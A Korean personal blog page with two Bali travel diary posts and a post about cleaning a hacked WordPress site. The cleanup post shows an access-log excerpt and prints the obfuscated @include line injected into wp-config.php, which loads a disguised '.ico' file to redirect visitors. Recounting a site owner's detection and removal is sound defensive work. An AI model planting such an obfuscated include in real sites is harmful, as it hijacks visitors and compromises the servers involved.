발리에서 생긴 일 +1

2018년 1월 15일2018년 1월 15일 불꽃남자 Leave a comment

사이버 친구

여행을 왔지만 나는 여전히 네트워크에 연결되어 있다. 누군가가 전해주는 새로운 이야기에 늘 목말라 있는 사람처럼 하루종일 메신저를 쳐다보고 있다. “나는 오빠의 사이버 친구가 싫어!” 라는 말이 내 귀를 통해 뇌에 입력 됐다. 불연듯 어떤 단어가 떠올랐다. “외로움” 나는 이 단어의 실체를 너무나 잘 안다. 옆지기와 대화를 하다가도 울리는 카톡소리에 대화의 맥이 끊겼단 순간들이 오버랩됐다. 그때 나도 외로움을 느꼈다. 때론 답답함도 느꼈다. 나보다 더 중요한 그녀들의 친구들… 나도 그때 그게 싫었다. 그리고 갑자기 미안해졌다. 나는 여전히 발리와 왔지만 내가 누구와 같이 왔는지 잊고 있었다. 미안하다고 사과했고, 발리에 있는 동안만큼이라도 꼽혀있는 네트워크의 선들을 정리해야겠다는 생각을 했다.

유튜버

지난 여행중에 가장 많이 본것중에 하나가 유튜브다. 처음엔 메이저리그 하일라이트를 보기 시작했는데, 어느새 각종 유튜버들을 구독해서 보고 있다. 나도 언젠가는 여행하면서 찍은 동영상을 올려야겠다는 생각을 했고, 오늘은 숙소 주변을 돌아다니면서 틈틈히 동영상을 찍었다. 언제 올리지는 모르겠다. 생각보다 편집이 귀찮다. 하지만 이번 발리여행은 글과 동영상으로 많이 남길 예정이다.

인도네시아어

이번 여행에 무엇을 해야할까? 곰곰히 생각해보다가 몇가지를 꼽아봤다.

동영상 남기기
예쁜 바다속 구경하기 (스노쿨링)
매일 요가하면서 건강한 척추 되찾기.

그리고 오늘 저녁을 먹다가 갑자기 하고 싶은 일이 하나더 늘었다. 바로 인도네시아어 배우기!

사정은 이렇다. 저녁을 먹고 들어가야겠다는 생각이 들어서 집으로 가는길에 조용한 손님이 없는 현지 식당에 들어갔다. 저녁을 먹고 계산을 하다가 와이프가 큰돈을 냈는지 잔돈을 구하러 종업원이 나간사이 주인 아주머니와 와이프가 간단한 대화를 하기 시작한 모양이다. 좀 오래 걸린다 싶어서 나도 잠깐 대화에 끼었다.

“혹시 인도네시아어로 헬로~ 인삿말이 뭐에요?” / “알로”에요.
“그럼 잘가는 뭐에요?” / “다다” 라고 쓰는데 친한 사람끼리 쓰는 말이에요.

영어로 대답을 해주던 친구가 왠지 주인 아주머니와 닮아보여서 혹시 둘은 엄마와 아들사이 인가 싶어서 물었더니 가족이란다. 그러면서 이름은 뭐니? 서로 묻고 주인 아주머니는 엄마 아빠가 중국 사람이란다. 짧은 대화지만 뭔가 친근한 대화가 계속이어졌다. 피곤해서 대화를 마무리 짖고 나왔는데 내일 다시가서 저녁을 먹고 인터뷰를 해야겠다는 생각이 들었다.

발리에서 생긴 일 +0

2018년 1월 14일2018년 1월 15일 불꽃남자 Leave a comment

연착

새벽같이 일어나서 택시타고 간 공항에는 눈이 내렸다. 간만에 떨었던 부지런함이 다 의미없다는 듯 비행기는 3시간동안 뜨지 않았다. 그리고 도착한 말레이 쿠알라룸프! 연결편을 놓칠줄 알았는데, 오히려 대기시간이 4시간에서 3시간으로 줄면서 아주 편하게 왔다.

어서와 발리는 처음이지?

드디어 발리에 도착했다. 동남아는 처음이다. 이미 하늘위에서 파악한 푸릇푸릇함이 겨울왕국인 한국과는 딴판이다. 공항을 빠져나오자 눅눅함이 내 피부에 내려앉았다. ㅎㅎㅎ 한국의 여름갖지만 온도가 높지않아 괜찮다.

택시

택시를 타고 숙소에 도착했다. 공항에서 택시 흥정에 이골이 나있던터라 몇번 흥정하고 아니다 싶어서 그냥 공항을 빠져나와 직접 블루버드 택시를 잡았다. 처음엔 잘 가나 싶었는데 역시나 결정적인 갈림길에서 딴길로간다. “저기,.. 너 지금 잘못 가고 있는데?” 지도를 보여줬다. “응.. 여기는 일방 통행이야 돌릴수 없어!” 음… 그럼 그렇치! 어딜가나 택시는 다 비슷하다. 그래도 공항에서 불렀던 가격보다는 싼가격에 왔다. 예상한 금액보다는 많이 나오긴 했지만 그래봐야 2~3천원 차이다. 스트레스 받지 말지어다.

여행의 연속

짐을 풀고나니 지난 세계여행의 연장선 같다. 아메리카 대륙을 거쳐 유럽을 갔고 한국에서 잠시 쉬었다가 다시 시작한 기분이다. 의례 짐을 풀고 일기를 쓰고 이제 잠이 들고,… 내일부터 새로운 날들이 펼쳐지겠지.

To be continue…

페이스북을 타고 들어오면 리다이렉션 되던 문제

2017년 12월 28일2017년 12월 28일 불꽃남자 Leave a comment

해커와의 전쟁

몇일째 채굴 공격을 막느라 정신이 없었다. 이번을 개기로 서버보안에 좀더 신경을 쓰게 된 개기가 된것 같다. 아무튼 내 블로그 곳곳엔 여전히 헛점이 있다. 11년전 서버에 대한 지식이 전무한 상태에서 워드프레스를 설치한게 화근이지싶다. 그땐 이거저거 해보겠다고 퍼미션도 777인 곳이 많았고 766도 많았다.

발단의 원인

일단 퍼미션이 엉망이었다는 것이 재앙인데 퍼미션이 엉망이기 때문에 해커들이 맘대로 내 서버에 파일도 올리고 실행도 시키고,..미안하다..ㅜㅜ
아무튼 해커와의 전쟁을 선포하고 워드프레스 폴더 곳곳을 find 명령으로 뒤져가며 php 파일명이 이상한 형태가 있는지 전부 찾아서 지웠다.

어떤 이상한 파일들이 있었는지는 지난 글을 참고하자.

여전히 풀리지 않는 리다이렉션 문제

이제 남은 건 페이스북에 링크된 글이 이상한 사이트로 넘어가는 문제만 남았다. 나도 몇번 겪어봤고 이상하다 싶었는데 그사이 신고도 3건이나 접수됐다. 그래서 제대로 잡아보자 싶어서 한번만 더 걸려라! 하는 심정으로 기다렸다. 그리고 드디어 잡았다!! 올타커니!!!

먼저 문제가 발생한 시간의 액세스 로그를 뒤졌다.

[27/Dec/2017:14:51:09 +0000] 200 211.243.39.14 http://m.facebook.com GET 
/archives/2017/12/nginx-%EC%99%80-php-fpm-%EC%B7%A8%EC%95%BD%EC%A0%90%EC%9D%84-%EB%85%B8%EB%A6%B0-%EC%B1%84%EA%B5%B4-%EA%B3%B5%EA%B2%A9/ 
HTTP/1.1 407 Mozilla/5.0 (iPad; CPU OS 11_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) 
Mobile/15C114 [FBAN/FBIOS;FBAV/153.0.0.53.87;FBBV/84268146;FBDV/iPad4,4;FBMD/iPad;FBSN/iOS;FBSV/11.2;FBSS/2;FBCR/;FBID/tablet;FBLC/ko_KR;FBOP/5;FBRV/0]

로그에 찍힌 이상한 에이전트는 검색을 통해 페이스북 앱임을 확인했고, 액세스 로그에 레퍼러(referer)가 제대로 찍힌걸 봐서는 링크는 제대로 타고 들어왔다. 고로 페이스북 문제는 아니다. 이제 문제는 내 서버에 설치된 워드프레스다. 분명 워드프레스가 리다이렉션 시키는 것 같다. 어떻게 그게 가능한지는 모르겠지만,.. 파일 업로드도 지맘대로 하는 판에 기존 파일을 수정하지 말라는 법도 없지 않나?

리다이렉션 말웨어(스파이웨어)

검색을 좀 해봤다.

https://fixmywp.com/blog/detect-clean-wordpress-malware-redirect.php

그랬더니 역시 있다! 나와 비슷한 증상을 겪는 문제가 워드프레스에서 심상치않게 발견되고 있나보다.

If a file is added, it’s often named to look like a legitimate file like that’s the part of WordPress core files. The file could be named sunrise.php, wp-users.php, wp-system or wp-configuration.php or something similar.

위에 나열된 파일은 다행이 없었다. 그리고 이제 남은건 아래 파일들… 모두 찾아봤다.

Typically hackers add the malicious scripts to .htaccess, wp-includes, wp-content/themes, wp-content/plugins or wp-content/uploads folders, or may also change your wp-config.php file.

그런데 뚜둥~!! wp-config.php 파일이 변조되어 있다!! 대박!! 이게 정말 가능한거구나… 놀랍다.

<?php
/*1008f*/

@include "\x2fva\x72/w\x77w/\x6egi\x6ex_\x72oo\x74/w\x70/w\x70-c\x6fnt\x65nt\x2fca\x63he\x2ffa\x76ic\x6fn_\x63ec\x652c\x2eic\x6f";

/*1008f*/^M

일단 변조된 부분을 지우고 다시 페북으로 링크를 걸어봐야겠다. 과연….

테스트 결과 성공적!

일단 몇번을 테스트해봤지만 문제는 없는것 같다. 그리고 검색에서 찾은 사이트에서 소개한 스파이웨어 스캔 사이트(https://quttera.com/)로 돌려봤더니… 7개 파일에서 의심스러운 코드가 발견됐다는 보고서를 받았는데, 다행히 내가 먼저 발견해서 지웠다!! wp-config.php 파일에 붙어서 여러 링크에 들어간것 같다.
아무튼 다행이야!! 이런게 하나 또 배운다!!